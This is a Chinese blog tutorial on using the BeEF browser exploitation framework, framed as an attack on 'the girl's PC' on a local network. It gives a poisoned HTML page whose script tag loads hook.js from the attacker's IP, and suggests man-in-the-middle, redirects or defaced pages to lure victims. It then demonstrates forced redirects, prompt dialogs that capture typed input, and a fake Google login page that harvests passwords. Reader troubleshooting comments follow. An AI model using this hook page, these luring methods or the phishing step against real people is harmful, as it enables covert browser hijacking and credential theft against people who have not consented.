内网漫步之如何调戏妹纸

Author：逍遥子
发布时间：August 10, 2019
12067 views
11 comments
3108 words
Categories：全部

环境说明：

kali linux(192.168.0.114) 黑阔滴设备
win7 (192.168.0.113) 妹纸的pc

认识beef

BEEF (The Browser Exploitation Framework)：一款浏览器攻击框架，用Ruby语言开发的，Kali中默认安装的一个模块，用于实现对XSS漏洞的攻击和利用。

BeEF主要是往网页中插入一段名为hook.js的JS脚本代码，如果浏览器访问了有hook.js(钩子)的页面，就会被hook(勾住)，勾连的浏览器会执行初始代码返回一些信息，接着目标主机会每隔一段时间（默认为1秒）就会向BeEF服务器发送一个请求，询问是否有新的代码需要执行。BeEF服务器本质上就像一个Web应用，被分为前端和后端。前端会轮询后端是否有新的数据需要更新，同时前端也可以向后端发送指示， BeEF持有者可以通过浏览器来登录 BeEF 的后端，来控制前端(用户的浏览器)。BeEF一般和XSS漏洞结合使用。
请输入图片描述

启动BEEF

方法一：点击栏目中的图标即可启动。
方法二：执行命令beef-xss
kali已经把beef-xss做成服务了，我们也可以使用systemctl 命令来启动或关闭beef服务

systemctl start beef-xss.service         #开启beef服务
systemctl stop beef-xss.service         #关闭beef服务
systemctl restart beef-xss.service      #重启beef服务

请输入图片描述
注意：初次配置要求我们输入我们的账号和密码（自行设定）
启动完成后，会自动跳转到浏览器的管理页面。输入我们刚才设置的账号和密码，登入系统。初始账号和密码均为beef

配置我们的钩子

方法有两种这里简单说下：
方法一：找含有xss漏洞的网站，插入js达到攻击目标。
方法二：自己写一个含有毒化的网页，让他人访问。（内网+外网）
这里以方法二为列：写个简单的页面。

<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>啦啦啦</title>
</head>

<body>
<h1>bbskali.cn</h1>
<script src="http://192.168.0.114:3000/hook.js"></script>
</body>
</html>

也就是说，想办法让别人访问我刚才写的这个页面。即可达到攻击的目标。方法比较多，如中间人攻击，重定向，挂黑页等等。

攻击演示

演示一（设备上线）

当攻击端访问我们的网页，在beef控制台中我们就可以看到上线的设备。
请输入图片描述

设备攻击

点击我们的设备，选择commands选项卡，我们可以看到有很多攻击模块。
请输入图片描述

读者可能发现在每个模块的前面都有一个有色（绿色，灰色，橙色，红色）的小圆标志。

在内部，BeEF可以检测出哪些命令模块可以在当前受害的浏览器工作，并用颜色表示：

绿色：命令模块可以在目标浏览器上运行，且用户不会感到任何异常

橙色：命令模块可以在目标浏览器上运行，但是用户可能会感到异常（比如可能会有弹窗，提示，跳转等）

灰色：命令模块尚未针对此目标进行验证，即不知道能否可运行

红色：命令模块不适用于此目标
这里给大家演示几个模块。其他的大家自己自娱自乐！

让浏览器自动访问指定的网站

点击Browser--hooked Doman --Redirect Browser输入我们的目标网址后点击Execute即可完成攻击。返回到刚才打开的页面，发现自动跳转到了kali论坛。

请输入图片描述

弹出对话框

点击Browser--hooked Doman --Create Alert Dialog输入我们要弹出的信息后点击Execute即可完成攻击。
请输入图片描述
效果如下：

弹出输入信息框

点击Browser--hooked Doman --Create Prompt Dialog输入我们要弹出的信息后点击Execute即可完成攻击。
请输入图片描述
同样的方式，当我们输入信息后，即可在管理面板看到刚才输入的信息！

结果：

制作钓鱼网站

选择Scoial Engineering--Google phishing改为我们kali的ip地址。点击Execute
请输入图片描述
我们的页面变成了google的登录页面

输入我们的账号和密码
请输入图片描述
获取到的密码

版权属于：逍遥子大表哥

本文链接：https://blog.bbskali.cn/1366.html

按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

Kali笔记一键关注

Last modification：August 10, 2019

正在沿街乞讨中……

11 comments

白白 中国广东东莞
November 20th, 2019 at 06:29 pm

该评论仅登录用户及评论双方可见

Reply
1. 逍遥子 中国北京
  November 20th, 2019 at 09:14 pm
  
  @白白
  
  感谢支持！
  
  Reply
老顽童 中国河南洛阳
November 13th, 2019 at 10:32 pm

beef登录的时候一直提示 invalid username or password

Reply
1. 逍遥子 中国北京
  November 14th, 2019 at 09:35 am
  
  @老顽童
  
  在配置文件中设置用户名和密码！
  
  Reply
  1. 老顽童 中国山东青岛
    November 15th, 2019 at 04:31 pm
    
    @逍遥子
    
    都设置了，就按照配置文件的用户名和密码登不上去
    
    Reply
老顽童 中国河南洛阳
November 13th, 2019 at 10:31 pm

为什么我登录一直登录不上去

Reply
Z.. 中国江苏镇江
October 31st, 2019 at 03:18 pm

我怎么测试都不成功呢，WIN10下，火狐打开的，你的这几个功能尝试都不行

Reply
1. 逍遥子 中国北京
  October 31st, 2019 at 06:50 pm
  
  @Z..
  
  是在同一局域网内吗？
  
  Reply
Z. 中国北京
August 15th, 2019 at 05:00 pm

感谢，马上去试试！

Reply
lteyox 中国山东青岛
August 13th, 2019 at 11:54 am

报错
You are using the Default credentials
Please change user and/or passwd in /etc/beef-xss/config.yaml

Reply
1. 逍遥子 中国北京
  August 13th, 2019 at 12:16 pm
  
  @lteyox
  
  配置密码问题，检查下config.yaml文件！
  
  Reply

妥当个哈狗
大佬请教一下，我一台普通的pc机，2块1t的硬盘，bios设置...
很无语
请问最后一步怎么修改VUE呀
xxxyyy
抖音那个现在是不是失效了，能下载不能播放，博主有空再验证一下呗
Kevin's Space
我改天试一下，现在我是传到网上的一些平台，倒也快速
Kevin's Space
这动环监控不会是你手搓的吧？大佬！

内网漫步之如何调戏妹纸

逍遥子 • 2019 年 08 月 10 日

<h3>环境说明：</h3><ul><li>kali linux(192.168.0.114) 黑阔滴设备</li><li>win7 (192.168.0.113) 妹纸的pc</li></ul><h3>认识beef</h3><p><code>BEEF</code> (The Browser Exploitation Framework)：一款浏览器攻击框架，用Ruby语言开发的，Kali中默认安装的一个模块，用于实现对XSS漏洞的攻击和利用。</p><p><code>BeEF</code>主要是往网页中插入一段名为<code>hook.js</code>的JS脚本代码，如果浏览器访问了有<code>hook.js</code>(钩子)的页面，就会被hook(勾住)，勾连的浏览器会执行初始代码返回一些信息，接着目标主机会每隔一段时间（默认为1秒）就会向BeEF服务器发送一个请求，询问是否有新的代码需要执行。BeEF服务器本质上就像一个Web应用，被分为前端和后端。前端会轮询后端是否有新的数据需要更新，同时前端也可以向后端发送指示， BeEF持有者可以通过浏览器来登录 BeEF 的后端，来控制前端(用户的浏览器)。BeEF一般和XSS漏洞结合使用。<br><img src="https://niu.bbskali.cn/42cbb8cd999212d14dd67e44c706dd59" alt="请输入图片描述" title="请输入图片描述" style=""></p><h3>启动BEEF</h3><p>方法一：点击栏目中的图标即可启动。<br>方法二：执行命令<code>beef-xss</code><br>kali已经把beef-xss做成服务了，我们也可以使用systemctl 命令来启动或关闭beef服务</p><pre><code class="lang-shell">systemctl start beef-xss.service         #开启beef服务
systemctl stop beef-xss.service         #关闭beef服务
systemctl restart beef-xss.service      #重启beef服务</code></pre><p><img src="https://niu.bbskali.cn/598c335560fe6f6affc8114788ea4f72" alt="请输入图片描述" title="请输入图片描述" style=""><br><strong>注意：</strong>初次配置要求我们输入我们的账号和密码（自行设定）<br>启动完成后，会自动跳转到浏览器的管理页面。输入我们刚才设置的账号和密码，登入系统。初始账号和密码均为<code>beef</code><br><img src="https://niu.bbskali.cn/472b85a471f332b8176e66d4c488079e" alt="请输入图片描述" title="请输入图片描述" style=""></p><h3>配置我们的钩子</h3><p>方法有两种这里简单说下：<br>方法一：找含有xss漏洞的网站，插入js达到攻击目标。<br>方法二：自己写一个含有毒化的网页，让他人访问。（内网+外网）<br>这里以方法二为列：写个简单的页面。</p><pre><code class="lang-html">&lt;!doctype html&gt;
&lt;html&gt;
&lt;head&gt;
&lt;meta charset=&quot;utf-8&quot;&gt;
&lt;title&gt;啦啦啦&lt;/title&gt;
&lt;/head&gt;

&lt;body&gt;
&lt;h1&gt;bbskali.cn&lt;/h1&gt;
&lt;script src=&quot;http://192.168.0.114:3000/hook.js&quot;&gt;&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;
</code></pre><p>也就是说，想办法让别人访问我刚才写的这个页面。即可达到攻击的目标。方法比较多，如中间人攻击，重定向，挂黑页等等。</p><h3>攻击演示</h3><h3>演示一 （设备上线）</h3><p>当攻击端访问我们的网页，在<code>beef</code>控制台中我们就可以看到上线的设备。<br><img src="https://niu.bbskali.cn/7a06f40561d103c523ce1845af305705" alt="请输入图片描述" title="请输入图片描述" style=""></p><h3>设备攻击</h3><p>点击我们的设备，选择<code>commands</code>选项卡，我们可以看到有很多攻击模块。<br><img src="https://niu.bbskali.cn/ca9a915081a8a15bf3f4ce03e01d0171" alt="请输入图片描述" title="请输入图片描述" style=""></p><p>读者可能发现在每个模块的前面都有一个有色（绿色，灰色，橙色，红色）的小圆标志。</p><p>在内部，BeEF可以检测出哪些命令模块可以在当前受害的浏览器工作， 并用颜色表示：</p><p><code>绿色</code>：命令模块可以在目标浏览器上运行，且用户不会感到任何异常</p><p><code>橙色</code>：命令模块可以在目标浏览器上运行，但是用户可能会感到异常（比如可能会有弹窗，提示，跳转等）</p><p><code>灰色</code>：命令模块尚未针对此目标进行验证，即不知道能否可运行</p><p><code>红色</code>：命令模块不适用于此目标<br>这里给大家演示几个模块。其他的大家自己自娱自乐！</p><h3>让浏览器自动访问指定的网站</h3><p>点击<code>Browser</code>--<code>hooked Doman</code> --<code>Redirect Browser</code>输入我们的目标网址后点击<code>Execute</code>即可完成攻击。返回到刚才打开的页面，发现自动跳转到了kali论坛。</p><p><img src="https://niu.bbskali.cn/9976f202e77c74dacc3dba8ac8679c91" alt="请输入图片描述" title="请输入图片描述" style=""></p><h3>弹出对话框</h3><p>点击<code>Browser</code>--<code>hooked Doman</code> --<code>Create Alert Dialog</code>输入我们要弹出的信息后点击<code>Execute</code>即可完成攻击。<br><img src="https://niu.bbskali.cn/88fc4b7f5138e3c7c9139aabcfd61526" alt="请输入图片描述" title="请输入图片描述" style=""><br>效果如下：<br><img src="https://niu.bbskali.cn/ff70451cce093d43031a9d67c32df77e" alt="请输入图片描述" title="请输入图片描述" style=""></p><h3>弹出输入信息框</h3><p>点击<code>Browser</code>--<code>hooked Doman</code> --<code>Create Prompt Dialog</code>输入我们要弹出的信息后点击<code>Execute</code>即可完成攻击。<br><img src="https://niu.bbskali.cn/5128ca60794bf945178536329b0cf681" alt="请输入图片描述" title="请输入图片描述" style=""><br>同样的方式，当我们输入信息后，即可在管理面板看到刚才输入的信息！<br><img src="https://niu.bbskali.cn/03813c3d4542cfb37d7197191d7adc93" alt="请输入图片描述" title="请输入图片描述" style=""><br>结果：<br><img src="https://niu.bbskali.cn/bdb3a1135198637b3ce92a7d9a168630" alt="请输入图片描述" title="请输入图片描述" style=""></p><h3>制作钓鱼网站</h3><p>选择<code>Scoial Engineering</code>--<code>Google phishing</code>改为我们kali的ip地址。点击<code>Execute</code><br><img src="https://niu.bbskali.cn/a24799830939026091d043d3ea2f050c" alt="请输入图片描述" title="请输入图片描述" style=""><br>我们的页面变成了google的登录页面<br><img src="https://niu.bbskali.cn/52d2192e6f7fac9b8b6dd90ae4f20a08" alt="请输入图片描述" title="请输入图片描述" style=""></p><p>输入我们的账号和密码<br><img src="https://niu.bbskali.cn/aceb288127732f06aa848c8ea568827c" alt="请输入图片描述" title="请输入图片描述" style=""><br>获取到的密码<br><img src="https://niu.bbskali.cn/3e26c400e5e0594df8460f005cf18a33" alt="请输入图片描述" title="请输入图片描述" style=""></p><hr class="content-copyright" style="margin-top:50px" /><div class="post-copyright" style="font-style:normal"> <p class="iconfont-copyright"><i class="glyphicon glyphicon-copyright-mark"></i></p><p class="content-copyright">版权属于：逍遥子大表哥</p><p class="content-copyright">本文链接：<a class="content-copyright" href="https://blog.bbskali.cn/1366.html">https://blog.bbskali.cn/1366.html</a></p><p class="content-copyright">按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。</p></div>

内网漫步之如何调戏妹纸

环境说明：

认识beef

启动BEEF

配置我们的钩子

攻击演示

演示一（设备上线）

设备攻击

让浏览器自动访问指定的网站

弹出对话框

弹出输入信息框

制作钓鱼网站

Leave a Comment Cancel reply
请输入正确的邮箱，以便收到回复!

11 comments

badusb攻击windows10（msfconsole版）

kali下androidshell那些事

kali linux WiFi钓鱼

浅谈Fluxion最新版无线钓鱼遇到的问题

typecho将Gravatar头像改为QQ头像

浅谈企业网络安全问题的内忧外患

Msfconsole使用总结

burp暴力破解基于Token的表单

XML External Entity attack

暴力破解（基于验证码的绕过）pikachu

内网漫步之如何调戏妹纸

环境说明：

认识beef

启动BEEF

配置我们的钩子

攻击演示

演示一 （设备上线）

设备攻击

让浏览器自动访问指定的网站

弹出对话框

弹出输入信息框

制作钓鱼网站

Leave a Comment Cancel reply 请输入正确的邮箱，以便收到回复!

11 comments

内网漫步之如何调戏妹纸

演示一（设备上线）

Leave a Comment Cancel reply
请输入正确的邮箱，以便收到回复!